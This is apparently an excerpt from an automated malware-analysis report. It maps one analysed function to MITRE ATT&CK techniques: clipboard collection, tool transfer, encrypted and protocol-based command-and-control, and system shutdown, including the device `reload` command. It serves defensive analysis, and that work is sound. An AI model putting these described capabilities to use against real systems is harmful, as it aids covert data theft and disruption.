Function 004062CA Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre